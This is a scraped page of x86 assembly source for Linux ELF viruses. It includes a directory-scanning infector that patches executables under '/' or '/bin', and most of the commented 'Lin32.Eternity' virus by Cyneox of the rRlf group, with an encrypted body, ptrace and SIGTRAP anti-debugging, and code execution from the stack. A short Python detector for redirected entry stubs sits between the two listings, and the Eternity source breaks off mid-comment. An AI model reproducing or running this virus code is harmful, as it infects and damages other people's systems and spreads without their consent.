STRUCT_MMAP_SZ 24 %define LOCAL_STACK_SZ 80 %define GLOBAL_STRUCT_SZ 134 %define MAGIC_FILE_MODE 7q %define MAGIC_FILE_BIT_MASK 170000q %define MAGIC_ELF 0x464c457f %define MAGIC_ELF_BASE 0x8048000 %define MAGIC_VIRUS_SIZE 0x1000 %define E_TYPE_OFFSET 16 %define E_ENTRY 0x18 %define E_PHOFF 0x1c %define E_PHENTSIZE 0x20 
%define E_SHOFF 0x20 %define E_SHENTSIZE 0x28 %define E_PHNUM 0x2c %define E_SHNUM 0x30 %define PHDR_INDEX_DATA 3 %define PHDR_INDEX_TEXT 2 %define PHDR_P_FILESZ 16 %define PHDR_P_MEMSZ 20 %define PHDR_P_VADDR 8 %define SHDR_SH_OFFSET 16 %define SHDR_SH_SIZE 20 %ifdef FUCK_SYSTEM %define FIRST_PATH 0x0 %endif %ifdef FUCK_USER %define FIRST_PATH 0x2e %endif %define PATH_LENGHT 128 %define REG_FILE 10q %define DIREC 4q %define POINT 0x002e %define DOUBLE_POINT 0x2e2e section .text global main main: pusha pushf push ebp mov esp,ebp ; fork us baby .... mov eax,SYS.FORK mov ebx,0 int 0x80 ; checking wheter child or parent process ; is active cmp eax,0 jne parent_process child_process: ; first of all we must get the sysuid of current ; user...maybe we're root ;)) mov eax,SYS.GETUID int 0x80 push eax ; get gid and store it on stack... mov eax,SYS.GETGID int 0x80 push eax ; allocate space for the stat structure ; which will be needed by the stat function... ; then we'll scan beginning with "/" all directories ; and searching for ELF files. sub esp,STRUCT_STAT_SZ ; here are the "default" infos which are needed by stat() push dword FIRST_PATH ; first path to start with scaning push dword 0x7 ; file permissions %ifdef FUCK_SYSTEM mov esi,_system %endif ; start scaning beginning with FIRST_PATH call scan4files add esp,4*2 ; restore "default" infos add esp,STRUCT_STAT_SZ ; restore stat structure add esp,8 ; restore gid and uid jmp restore_data parent_process: mov eax,SYS.WRITE mov ebx,1 mov ecx,payload mov edx,len int 0x80 jmp _exit scan4files: %ifdef FUCK_USER mov esi,esp add esi,8 %endif mov edi,esp add edi,4 ; edi = access permissions ; store some space for our "global" structure for files ; this structure will contain the needed file descriptor ; , the access permissions and the complete path name ; of that file... 
sub esp,4 ; fd sub esp,1 ; permissions sub esp,1 ; file type : reg file or directory sub esp,PATH_LENGHT ; complete path lenght of file ;---> GLOBAL_STRUCT_SZ = size of this "global" structure ; stat our file name and complete the global structure ; with necessary information mov eax,SYS.STAT mov ebx,esi ; file name mov ecx,ebp ; BASE pointer sub ecx,STRUCT_STAT_SZ ; move to beginning of our stat structure int 0x80 cmp eax,0x0 jge stat_ok jmp _stat_error restore_data: pop ebp popf popa jmp _exit stat_ok: ; checking permissions on FIRST_PATH mov ebx,ebp sub ebx,STRUCT_STAT_SZ ; move to stat structure mov ax,[ebx+8] ; stat.st_mode ; comparing uid of FIRST_PATH with uid of currently ; executed file... mov cx,word [ebx+12] ; stat.st_uid cmp word cx,[ebp-4] je user_permission ; we have user permission on FIRST_PATH mov cx,word [ebx+14] cmp word cx,[ebp-8] je group_permission ; group access ; check if we're root ... hehe.. cmp word [ebp-8],0 je user_permission others_permission: ; ax = stat.st_mode ( look below ) and al,MAGIC_FILE_MODE jmp access_file user_permission: shr ax,0x6 and al,MAGIC_FILE_MODE jmp access_file group_permission: shr ax,0x3 and al,MAGIC_FILE_MODE access_file: ; store access permissions to our global ; structure mov byte [esp+PATH_LENGHT+1],al ; permissions ; checking file type : REG_FILE or DIREC mov ebx,ebp sub ebx,STRUCT_STAT_SZ mov ax,[ebx+8] ; stat.st_mode and ax,MAGIC_FILE_BIT_MASK shr ax,12 ; store file type to glob. structure... mov byte [esp+PATH_LENGHT],al ; checking if REG_FILE or DIREC ... mov al,byte [esp+PATH_LENGHT] cmp al,DIREC je directory ; jmp if file name is a directory cmp al,REG_FILE je near regular_file ; jmp if regular file... jmp _access_error directory: ; save current working directory... mov eax,SYS.GETCWD mov ebx,esp mov ecx,PATH_LENGHT int 0x80 ; opening directory... mov eax,SYS.OPEN mov ebx,esi ; file name mov ecx,0 ; ecx = 0 = O_RDONLY mov edx,0 int 0x80 ; check returned file descriptor.... 
cmp eax,0x0 jge open_ok jmp _open_error open_ok: ; save file descriptor to our glob.structure... mov [esp+PATH_LENGHT+2],eax ; file descriptor ; chdir to that directory so we can search for another ; files in that directory... mov eax,SYS.CHDIR mov ebx,esi ; file name int 0x80 ; allocating stack space for our dirent structure ; which will be needed for searching new files etc. sub esp,STRUCT_DIRENT_SZ read_directory: mov eax,SYS.READDIR mov ebx,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+2] ; file descriptor mov ecx,esp mov edx,1 int 0x80 cmp eax,0x1 jne near _readdir_error ; search for files in the directory and call scan4files... ; we'll have to skip "." and ".." coz they're ; irrelevant to us cmp word [esp+10],POINT ; [esp+10]=dirent.d_name je skip_points cmp word [esp+10],DOUBLE_POINT je skip_points xor eax,eax mov al,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+1] ; file permissions add esp,10 ; dirent.d_name %ifdef FUCK_USER push eax %endif %ifdef FUCK_SYSTEM mov esi,esp %endif call scan4files %ifdef FUCK_USER add esp,4 ; restore that "push eax" %endif sub esp,10 ; restore "add esp,10" skip_points: jmp read_directory regular_file: ; open file with flags READ & WRITE mov eax,SYS.OPEN mov ebx,esi ; esi = file name xor ecx,ecx mov ecx,2 int 0x80 cmp eax,0 jg file_write_perms jmp scan_return file_write_perms: ; save opened file descriptor to global structure mov [esp+PATH_LENGHT+2],eax ; finding out file's size using lseek ;) mov eax,SYS.LSEEK mov ebx,[esp+PATH_LENGHT+2] ; fd xor ecx,ecx mov edx,2 ; SEEK_END int 0x80 file_map: mov ecx,eax ; ecx = file lenght mov eax,SYS.MMAP mov edx,[esp+PATH_LENGHT+2] ; fd ; declaring mmap structure ... sub esp,STRUCT_MMAP_SZ mov dword [esp],0 ; int start mov [esp+4],ecx ; file lenght mov dword [esp+8],3 ; READ_WRITE mov dword [esp+12],1 ; MAP_SHARED mov dword [esp+16],edx ; fd mov dword [esp+20],0 ; int offset mov ebx,esp ; pointer to mmap structure int 0x80 ; restoring mmap structure... 
add esp,STRUCT_MMAP_SZ cmp eax,-1 jne file_map_ok jmp scan_return file_map_ok: ; save us some stack where we can store mmap addr,file ; lenght etc... mov esi,eax mov ebx,[eax] mov edx,MAGIC_ELF cmp edx,ebx je file_is_elf close_target: mov ebx,esi mov eax,SYS.UNMMAP int 0x80 mov eax,SYS.CLOSE mov ebx,[esp+PATH_LENGHT+2] int 0x80 jmp scan_return file_is_elf: ; ok...we found an ELF file.but remember there are ; several ELF file types like : executables, objects, ; relocatables...only the executable ones are for us ; relevant... file_elf_exec: ; checking is found file is an executable ELF file... ; therefore we will jump at offset ehdr.e_type and will ; compare the value with 2 . if the value = 2 then we found ; an executable and we can start with the infection of our file.. mov eax,esi ; esi = addr of maped file add eax,E_TYPE_OFFSET mov eax,[eax] ; data pointed by eax(addr of maped file) mov edx,eax xor eax,eax mov al,dl ; we only need the first byte cmp byte al,0x2 ; checking if ehdr.e_type == ET_EXEC je elf_exec_ok jmp close_target elf_exec_ok: ; we need some stack for storing our mmap addr , file ; lenght , etc. sub esp,LOCAL_STACK_SZ mov [esp+4],esi ; mmap addr mov [esp+8],ecx ; file lenght mov eax,[esi+E_ENTRY] ; ehdr.e_entry mov [esp+12],eax ; store entry point mov eax,[esi+E_PHOFF] ; ehdr.e_phoff mov [esp+16],eax ; store phdr offset mov eax,[esi+E_SHOFF] ; ehdr.e_shoff mov [esp+20],eax ; store shdr offset mov eax,[esi+E_PHNUM] and eax,0xffff ; ehdr.e_phnum mov [esp+24],eax ; store phdr number mov eax,[esi+E_SHNUM] and eax,0xffff ; ehdr.e_shnum mov [esp+28],eax ; store shdr number check_if_space: ; checking if space is available between code segment ; and data segment... ; since the code size is limited we must check if there is ; enough space where to insert our virus code.maximum code ; size is restricted by code alignment which is 0x1000=4096. 
; SO : if the difference between code and data segment ; is lower than ELF_PAGE_SZ=0x1000 then we'll have to ; cancel our infection routine... mov ebx,[esp+16] ; e_phoff add esi,ebx ; esi=ptr to mapped ; file --> move to first PHDR entry phdr[0] mov ecx,[esi+32*PHDR_INDEX_DATA+PHDR_P_VADDR] ; phdr[3].p_vaddr : data segment (RW) mov eax,[esi+32*PHDR_INDEX_DATA+PHDR_P_FILESZ] ; phdr[3].p_filesz mov ebx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; phdr[2].p_filesz: text segment (RE) mov [esp+32],ebx ; store p_filesz of .text mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; phdr[2].p_vaddr add ebx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; phdr[2].p_filesz + phdr[2].p_vaddr sub ecx,ebx ; phdr[3].p_vaddr - (phdr[2].p_filesz + phdr[2].p_vaddr) mov eax,MAGIC_VIRUS_SIZE ; the virus size is actually the ELF_PAGE_SIZE cmp ecx,eax jl near no_insertion_space ; from now on the target is actually ready to be infected... ; we have an executable ELF file which has enough space ; between his code and data segment to insert our virus code... %ifdef FUCK_USER start_infection: ; first of all we must do some "comparisation" processes.. 
mov eax,[esp+12] ; e_entry sub eax,MAGIC_ELF_BASE ; find out offset to entry code mov esi,[esp+4] ; addr to mapped file add esi,eax ; compare "call" of current program with "call" of target ; to see if target was infected by a superiour virus add esi,0x21 mov ebx,esi ; "beyond the call" sub esi,0x21 add esi,0x1d mov ecx,esi ; our patch address mov [esp+36],ebx ; store addr "beyond the call" mov [esp+40],ecx ; store "our patch address" ; now we'll have to patch that addr with our new entry ; point.REMEMBER: the entry point in the EHDR WILL NOT BE ; CHANGED.THATS THE FUNNY THING OF THIS VIRUS ;=) mov esi,[esp+4] ; mmap addr mov ebx,[esi+E_PHOFF] ; offset to first byte ; of PHDR add esi,ebx ; move to first byte mov ecx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; p_filesz mov edx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; p_vaddr add ecx,edx ; p_vaddr + p_filesz ; align up the new entry point addr ; ALIGN_UP(x) (((x)+15)& ~15) add ecx,15 ; ecx = new entry ; point and ecx,~15 mov ebx,[esp+36] ; addr beyond the call sub ecx,ebx mov edx,[esp+40] ; "patch addr" ; first of all find out the addr which call should have called... 
mov esi,[esp+36] ; beyond the call mov eax,[edx] ; patch point add eax,esi ; addr we search for mov [edx],ecx ; store new addr mov [esp+44],ecx ; copy new relative offset to stack mov [esp+48],eax ; original addr %endif %ifdef FUCK_SYSTEM start_infection: mov eax,[esp+12] ; entry addr sub eax,MAGIC_ELF_BASE ; offset to entry point mov esi,[esp+4] ; mmap addr add esi,eax add esi,0x18 ; our patch point mov ecx,esi ; our patch address sub esi,0x18 add esi,0x21 ; "beyond the call" mov ebx,esi mov [esp+36],ebx ; store addr "beyond the call" mov [esp+40],ecx ; store "our patch address" mov esi,[esp+4] ; mmap addr mov ebx,[esi+E_PHOFF] ; offset to first byte ; of PHDR add esi,ebx ; move to first byte mov ecx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; p_filesz mov edx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; p_vaddr add ecx,edx ; p_vaddr + p_filesz ; align up the new entry point addr ; ALIGN_UP(x) (((x)+15)& ~15) add ecx,15 ; ecx = new entry ; point and ecx,~15 mov ebx,[esp+40] ; our patch addr mov eax,[ebx] ; save original addr to stack mov [esp+48],eax mov [ebx],ecx ; patching addr %endif patch_e_phoff: mov esi,[esp+4] mov ebx,[esi+E_PHOFF] mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] add esi,ebx ; store p_filesz to stack mov [esp+52],eax ; patch p_filesz add dword[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ],MAGIC_VIRUS_SIZE ; store p_memsz to stack mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_MEMSZ] mov [esp+56],eax ; patch p_memsz add dword[esi+32*PHDR_INDEX_TEXT+PHDR_P_MEMSZ],MAGIC_VIRUS_SIZE ; initialize registers for patch_phdr mov edx,[esp+4] ; mmap addr mov eax,[esp+16] ; old ehdr.e_phoff add edx,eax ; move to phdr[0] mov ebx,MAGIC_VIRUS_SIZE mov eax,[esp+32] ; old p_filesz mov ecx,[esp+24] ; ehdr.e_phnum -> needed by the loop instruction patch_phdr: cmp dword [edx+4],eax ; (edx+4)=p_offset ; compare if ; p_offset >= end of code segment(old p_filesz) jbe next_phdr_entry add dword [edx+4],ebx ; else patch ; p_offset -> new p_offset = old p_offset + MAGIC_VIRUS_SIZE 
next_phdr_entry: add edx,E_PHENTSIZE ; move to next entry loop patch_phdr ; patching ehdr.e_shoff mov ebx,[esp+4] mov ecx,[ebx+E_SHOFF] ; e_shoff add dword [ebx+E_SHOFF],MAGIC_VIRUS_SIZE mov edx,[esp+4] mov ebx,ecx ; old e_shoff add edx,ecx ; move to shdr[0] ; initialize registers for patch_shdr mov ecx,[esp+28] ; ehdr.e_shnum mov eax,[esp+32] ; old p_filesz patch_shdr: cmp dword [edx+SHDR_SH_OFFSET],eax ; compare if ; shdr.sh_offset >= old p_filesz jge do_patch mov ebx,dword [edx+SHDR_SH_OFFSET] add ebx,dword [edx+SHDR_SH_SIZE] cmp ebx,eax ; if sh_offset + sh_size == old p_filesz je patch_sh_size ; patch the code segment jmp next_shdr_entry patch_sh_size: ; include trailing code in last section ; of code segment (should be .rodata) add ebx,MAGIC_VIRUS_SIZE ; increase lenght of .rodata jmp next_shdr_entry do_patch: add dword [edx+SHDR_SH_OFFSET],MAGIC_VIRUS_SIZE ; patch sh_offset next_shdr_entry: add edx,E_SHENTSIZE ; next SHDR entry loop patch_shdr fuck_em_all: mov ebx,[esp+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd xor ecx,ecx ; ecx=0=beginning of file xor edx,edx ; edx=0=SEEK_SET mov eax,SYS.LSEEK int 0x80 ; seek to end of code segment(old p_filesz) mov ecx,[esp+32] ; old p_filesz mov eax,SYS.LSEEK int 0x80 ; caution: lame coding style ;) ; now we'll need to "save" the original content ; of the file so we can copy it after infecting ; file...therefore we'll use sys.read.. ; like i said ; quite lame ;) mov eax,[esp+32] ; old p_filesz mov ebx,[esp+8] ; file lenght sub ebx,eax sub esp,ebx ; create temporary stack mov edx,ebx mov esi,edx ; ebx=edx=esi=difference ; seeking... mov ebx,[esp+edx+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd mov ecx,[esp+edx+32] ; old p_filesz xor edx,edx ; edx = 0 mov eax,SYS.LSEEK int 0x80 ; reading... mov edx,esi mov ecx,esp mov eax,SYS.READ int 0x80 write_me: ; we'll gonna seek again in the file... 
; but this time with the aligned offset(needed ; to insert our virus code properly) mov ebx,[esp+esi+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd mov ecx,[esp+esi+32] ; old p_filesz ; ALIGN_UP(x) ... add ecx,15 and ecx,~15 xor edx,edx ; edx=0=SEEK_SET mov eax,SYS.LSEEK int 0x80 ; writting... --> pushy mov ecx,pushy mov edx,1 mov eax,SYS.WRITE int 0x80 ; writting... --> original entry point mov ecx,[esp+esi+48] push ecx mov ecx,esp mov edx,4 mov eax,SYS.WRITE int 0x80 pop ecx ; writting... --> till _exit mov ecx,main mov edx,len_till_exit mov eax,SYS.WRITE int 0x80 ; writting...--> virus_code="ret" mov ecx,virus_code mov edx,vircode_len mov eax,SYS.WRITE int 0x80 ; writting...--> after exit mov ecx,test_me mov edx,test_me_len mov eax,SYS.WRITE int 0x80 write_rest_of_file: ; seek after the virus code to insert the rest ; of the file ; seek to beginning of file xor ecx,ecx xor edx,edx mov eax,SYS.LSEEK int 0x80 mov ecx,[esp+esi+32] ; old p_filesz add ecx,MAGIC_VIRUS_SIZE xor edx,edx mov eax,SYS.LSEEK int 0x80 mov ecx,esp mov edx,esi mov eax,SYS.WRITE int 0x80 ; write rest of file add esp,esi ; restoring temporary stack no_insertion_space: unmap: mov eax,SYS.UNMMAP mov ebx,[esp+4] ; mmap addr mov ecx,[esp+8] ; file lenght int 0x80 add esp,LOCAL_STACK_SZ jmp close_target scan_return: add esp,GLOBAL_STRUCT_SZ ret _readdir_error: mov eax,SYS.CLOSE ; close directory mov ebx,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+2] add esp,STRUCT_DIRENT_SZ ; restore dirent structure mov eax,SYS.CHDIR ; move to previous current directory mov ebx,esp ; old PATH int 0x80 jmp _stat_error _open_error: jmp _stat_error _access_error: _stat_error: add esp,GLOBAL_STRUCT_SZ ; restore data allocated for our global structure ret len_till_exit equ $-main _exit: xor eax,eax inc eax int 0x80 test_me: %ifdef FUCK_USER payload db "[[ Cyneox/DCA (C) Copyright 2004 ]]!",0xA len equ $-payload %endif %ifdef FUCK_SYSTEM payload db "<< ..You've been binomitized!.. 
>> by cyneox",0xA len equ $-payload _system db "/bin",0x0 ; path where to search in when "fucking" up the whole system %endif pushy: push dword 0x0 virus_code: ret vircode_len equ $-virus_code test_me_len equ $-test_me

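A defender-side check for the operand patching in the listing above, added here as an example and not part of the original article or the author's code. The listing leaves `e_entry` alone and instead rewrites either the dword at entry+0x18 or the call displacement at entry+0x1d (resolved against entry+0x21), pointing it at the aligned end of the text segment. The sketch flags either operand when it resolves inside an executable segment but outside every section marked executable. The offsets come from the listing; the opcode checks (0x68, 0xE8), the function names and the sample image are assumptions and constructed data.

```python
import struct

PT_LOAD, PF_X, SHF_EXECINSTR = 1, 0x1, 0x4


def parse_elf32(data):
    """Return (e_entry, program headers, section headers) of a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4:6] != b"\x01\x01":
        raise ValueError("not a little-endian ELF32 file")
    try:
        e_entry, e_phoff, e_shoff = struct.unpack_from("<III", data, 24)
        phentsize, phnum, shentsize, shnum = struct.unpack_from("<HHHH", data, 42)
        phdrs = [struct.unpack_from("<8I", data, e_phoff + i * phentsize) for i in range(phnum)]
        shdrs = [struct.unpack_from("<10I", data, e_shoff + i * shentsize) for i in range(shnum)]
    except struct.error as exc:
        raise ValueError("truncated ELF structures") from exc
    return e_entry, phdrs, shdrs


def file_offset(phdrs, vaddr):
    """Translate a virtual address to a file offset through the PT_LOAD entries."""
    for p_type, p_offset, p_vaddr, _paddr, p_filesz, _memsz, _flags, _align in phdrs:
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_filesz:
            return p_offset + (vaddr - p_vaddr)
    return None


def in_exec_segment(phdrs, vaddr):
    # Phdr tuple: type, offset, vaddr, paddr, filesz, memsz, flags, align
    return any(p[0] == PT_LOAD and p[6] & PF_X and p[2] <= vaddr < p[2] + p[5] for p in phdrs)


def in_exec_section(shdrs, vaddr):
    # Shdr tuple: name, type, flags, addr, offset, size, link, info, addralign, entsize
    return any(s[2] & SHF_EXECINSTR and s[3] <= vaddr < s[3] + s[5] for s in shdrs)


def suspicious_stub_targets(data):
    """List (operand, target) pairs from the entry stub that land in executable
    memory not covered by any executable section."""
    entry, phdrs, shdrs = parse_elf32(data)
    off = file_offset(phdrs, entry)
    if off is None or off + 0x21 > len(data) or not shdrs:
        return []  # no stub to read, or no section table to compare against
    candidates = []
    if data[off + 0x17] == 0x68:  # assumed: push imm32, operand at entry+0x18
        target = struct.unpack_from("<I", data, off + 0x18)[0]
        candidates.append(("push imm32 at entry+0x18", target))
    if data[off + 0x1C] == 0xE8:  # assumed: call rel32, operand at entry+0x1d
        rel = struct.unpack_from("<i", data, off + 0x1D)[0]
        candidates.append(("call rel32 at entry+0x1d", (entry + 0x21 + rel) & 0xFFFFFFFF))
    return [(what, t) for what, t in candidates
            if in_exec_segment(phdrs, t) and not in_exec_section(shdrs, t)]


def build_sample(push_target, call_target):
    """Constructed 312-byte ELF32 image (not a real program): one R+X PT_LOAD,
    an executable section at 0x08048060 and a non-executable one at 0x080480A0."""
    base, entry = 0x08048000, 0x08048060
    stub = bytearray(0x40)  # zero filled; only the two operands matter here
    stub[0x17] = 0x68
    struct.pack_into("<I", stub, 0x18, push_target)
    stub[0x1C] = 0xE8
    struct.pack_into("<i", stub, 0x1D, call_target - (entry + 0x21))
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF\x01\x01\x01", 2, 3, 1,
                       entry, 52, 0xC0, 0, 52, 32, 1, 40, 3, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, base, base, 0xC0, 0xC0, 5, 0x1000)
    shdrs = (struct.pack("<10I", *([0] * 10))
             + struct.pack("<10I", 0, 1, 0x6, entry, 0x60, 0x40, 0, 0, 16, 0)
             + struct.pack("<10I", 0, 1, 0x2, base + 0xA0, 0xA0, 0x20, 0, 0, 4, 0))
    return bytes(ehdr + phdr + bytes(12) + stub + bytes(0x20) + shdrs)


if __name__ == "__main__":
    samples = {
        "clean": build_sample(0x08048090, 0x08048098),
        "call operand redirected": build_sample(0x08048090, 0x080480B0),
        "push operand redirected": build_sample(0x080480B0, 0x08048098),
    }
    for name, image in samples.items():
        hits = suspicious_stub_targets(image)
        print(name, [(what, hex(t)) for what, t in hits])
```

The check needs an intact section header table and returns an empty list when the image has none, so a clean result on a file without section headers carries no weight.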
sources

Lin32.Eternity Cyneox ; _ _ ____ _ _ _ ;( ) (_) ___ __ ( __)( ) (_)( ) ;| | _ ____ |_ /|_ | | |_ | | ___ __ ____ _ | | _ _ ;( )_ ( )( __ )__)) /(_ _ ( _) ( _)( o_)( _)( __ )( )( _)( V ) ;/___\/_\/_\/_\\__//___\(_)/____\/_\ \( /_\ /_\/_\/_\/_\ ) / ; /_/ ; __ _ :: Intro ::::::::::::::::::::::: ; Hello out there! I dont't know ; _dP 9m_ why but in the last time I've ; _#P __Author__ 9#_ worked a lot with encryption ; d#@ 9#m tools, methods etc. Thisvirus ; d## Cyneox/rRlf/Helith ### should be the beginning of my ; J### ###L new VXing-era: poly engines, ; {###K J###K metamorphism etc. It took me a ; ]####K ___aaa___ J####F long time to write this virus ; __gmM######_ w#P"" ""9#m _d#####Mmw__ but as you see: I've made it!!! ; _g##############mZ_ __g##############m_ ; _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ :: Greets :::::::::::::::: ; a###"" ,Z"#####@" '######"\g ""M##m First of all I'd like to ;J#@" 0L "*## ##@" J# *#K thank SPTH for reminding ;#" __Date__ `# "_gmwgm_~ dF __Dedicated__ `#_ me not to stop coding. ;F "#_ ]#####F _dK JE Then a big fat "Thank ; 1.04.2005 *m__ ##### __g@" Caline, my F you" to rembrandt and ; "PJ#####LP" eternal love just dr3f who helped me while ;` 0######_ 4 ' coding the encryption ; _0########_ you !!! routine. ; . _d#####^#####m__ , And a (pi*BIG_FAT)^3 ; "*w_________am#####P" ~9#####mw_________w*" "I Love You" to Caline. ; ""9@#####@M"" ""P@#####@M"" Te Iubesc Iubita Mea!!! ; :: Overview ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; ; * General information * ; Name : Lin32.Eternity ; Author: Cyneox member of rRlf VX Group [http://www.rrlf.de.vu] ; Helith Network [https://vx.helith.net] ; Date : 01.04.2005 ; Size : 3432 ; ; * Technical details * ; Infection : the writes himself at entry point and the original data ; will be stored at EOF ; EPO : Since the memory has WRITE+EXECUTE flags we can simply ; copy the original data from EOF to the entry point of file ; and execute the original code. 
Data will be only in the memory
;              overwritten.
; Target     : ELF (Executable and Linking Format) files in the local directory
; Encryption : The virus body will be at run-time encrypted using the "Sliding
;              key Encryption" method. The encryption will be randomly
;              generated using the syscall time(). Then the return value will
;              be a little bit modified so that the encryption key isn't 100%
;              dependent from the returned value.
; Decryption : The virus will compare bytewise if the file where it's currently
;              executed is encrypted. That's important since the "dropper"
;              contains no encrypted data so I had to implement sth for checking
;              that
;
; :: About :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; It's about an ELF virus infecting all executable ELF files in the current
; directory. Our virus has a certain size , lets call it "len". If a file is
; found "len" bytes from the entry point of the target will be copied at the
; end of the file. Then our virus will copy himself at the entry point.
; For the first time I'm using a new art of EPO: Like I said "len" is the size
; of our virus body. After executing the virus code will "load" "len" bytes from
; EOF and will store the data at [ebp-d3lta+main], which is the entry point
; of our virus.
;
; Maybe you're asking yourself how is it possible to overwrite data in the
; memory. Well therefore I used mprotect for making the memory region writeable
; and executable. After loading the data from EOF only the data in the memory
; will be overwritten. Overwriting the data in the file will be senseless: The
; virus will be simply overwritten by the original code and that's silly ;)
;
; After infecting other files the infected file will encrypt his virus body
; beginning with [ebp-d3lta+start_virus]. At every execution of the file , a
; new encryption key will be generated making the encryption routine safer.
; The "dropper" , the 0 generation , contains no encrypted data.
Before ; decrypting the code several checks are done whether the virus body is encrypted ; or not. The virus will simply compare the first , 5th , 7th byte beginning ; from [ebp-d3lta+start_virus]. Just look at the code... Its the first virus ; I've commented so well... So have phun !! ;) ; ; :: Contact :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; W3B: http://cyneox.go.ro ; https://vx.helith.net ; https://vx.helith.net/cyneox/ ; ; M@il: cyneox@helith.net ; ; IRC : #lin32asm , #vxers ; #virus bits 32 global main section .text ;---++++++++++++++++++++++++++ main +++++++++++++++++++++++++++--- main: push eax pushad ; save all registers mov ebx,dword [esp+32+4+4] ; argv[0]=host file which is ; currently executed ; now we'll create position independent code ; so we'll have to calculate absolute addresses ; at run-time. ; ; this is taken from Elf-Virus-Writing-Tutorial ; from Alexander Bartolich: ; The instruction pointer is a register that holds th the address ; of the next instruction to execute. Unlike "real" registers ; there is no direct way to retrieve its value. A call pushes the ; current value of IP onto the stack and adds a relative offset ; to it. Offset 0 just continues with the following instruction. ; And if that instruction is a pop we load the the address of the ; pop instruction itself in a regular register. call d3lta ;---++++++++++++++++++++++++++ d3lt@ ++++++++++++++++++++++++++--- d3lta: pop ebp ; ebp should be addr of d3lta push ebx ; save argv[0] on stack is_encrypted: ; The "dropper" will contain ; no encrypted data...But the infected ; files will do contain encrypted data ;) ; Thats why I'm checking now if the code ; is encrypted or not.... 
db 0xb9 ; dummy opcode = "mov ecx," encryption_key: dd 8977h ; our dear encryption key ;------------------------------------------------------------- ; Source: objdump -d eternity ; ; 080480ef <start_virus>: ; 80480ef: b8 1a 00 00 00 mov $0x1a,%eax ; 80480f4: 31 db xor %ebx,%ebx ; 80480f6: 31 c9 xor %ecx,%ecx ; ;------------------------------------------------------------- lea ebx,[ebp-d3lta+start_virus] mov cl,[ebx] cmp byte cl,0xb8 ; b8 1a 00 00 00 mov $0x1a,%eax jne Decryption add ebx,5 mov cl,[ebx] cmp byte cl,0x31 ; 31 db xor %ebx,%ebx jne Decryption add ebx,2 mov cl,[ebx] cmp byte cl,0x31 ; 31 c9 xor %ecx,%ecx jne Decryption je start_virus ; if equal --> code isnt encrypted ;---++++++++++++++++++++++++++ Decryption ++++++++++++++++++++++++++--- Decryption: ; Still we're trying to write in the memory ; we'll have to mprotect that memory region ; and make it writable, because we want to ; save the decrypted code in that region. lea ebx, [ebp-d3lta+start_virus] ; const void *addr and ebx, 0FFFFF000h ; Since I dont really know the correct size ; of the code segment I'll asume its 0x3000 ;) mov ecx,0x1000 ; size_t len mov edx, 7 ; int prot PROT_READ|PROT_WRITE|PROT_EXEC mov eax,125 ; SYS.MPROTECT int 0x80 mov ecx,(eternity_end-start_virus)/4 mov ebx,dword [ebp-d3lta+encryption_key] lea esi,[ebp-d3lta+start_virus] mov edi,esi cld loop_it: lodsd ; move dword from [esi] to eax ; and increase "esi" by 4 xor eax,ebx ; the encryption "routine" ;) inc ebx ; increase ebx by 1 stosd ; move dword from "eax" to [edi] ; and increase "edi" by 4 loop loop_it ; ecx -= ecx ; while ecx>0 jmp loop_it_baby ;---+++++++++++++++++++++++ start_virus +++++++++++++++++++++++++--- start_virus: ; Unlike my usual infecting techniques here I'll use ; a new one: I'll put the host code onto the stack, ; mprotect it and then I'll execute this code. ; This is quite usefull since memory operations are ; faster than file/device operations. 
; Check if our currently executed programm ; is beeing debugged...Therefore we'll use ; ptrace to check that. ;------------------------------------------------------------- ; ------------------> ANTI-DEBUGG Technique <----------------- ;------------------------------------------------------------- ; NAME ; ptrace - process trace ; ; SYNOPSIS ; #include <sys/ptrace.h> ; ; long ptrace(enum __ptrace_request request, pid_t pid, ; void *addr, void *data); ;------------------------------------------------------------ mov eax,26 ; SYS.PTRACE xor ebx,ebx ; PTRACE_TRACEME : ; Indicates that this process is to be traced ; by its parent xor ecx,ecx ; pid_t pid xor edx,edx inc edx ; void *addr xor esi,esi ; void *data int 0x80 test eax,eax jne near Bye_Bye ; Our programm is beeing ; debugged!!! ; Try to catch the signal SIGTRAP and to handle ; with it. We'll create a "handler"-function ; to handle with our catched signal. ;------------------------------------------------------------- ; ------------------> ANTI-DEBUGG Technique <----------------- ;------------------------------------------------------------- ; NAME ; signal - ANSI C signal handling ; ; SYNOPSIS ; #include <signal.h> ; ; typedef void (*sighandler_t)(int); ; ; sighandler_t signal(int signum, sighandler_t handler); ; ;------------------------------------------------------------ mov eax,48 ; SYS.SIGNAL mov ebx,0x5 lea ecx,[ebp-d3lta+handler] ; signal handler function mov ecx,esp ; handler int 0x80 pop ebx ; argv[0] mov ecx,eternity_end-hostmain ; get offset(distance) between ; start code and end code sub esp, ecx ; create space where to put code lea esi, [ebp-d3lta+hostmain] ; load "source" where to copy data ; from mov edi, esp ; destination rep movsb ; copy data from esi to edi jmp esp ; jump to copied code on the stack ;---++++++++++++++++++++++ hostmain +++++++++++++++++++++++++--- hostmain: push ebx ; argv[0] = host file ;---------------------------------- --------------------------- ; NAME ; mprotect - 
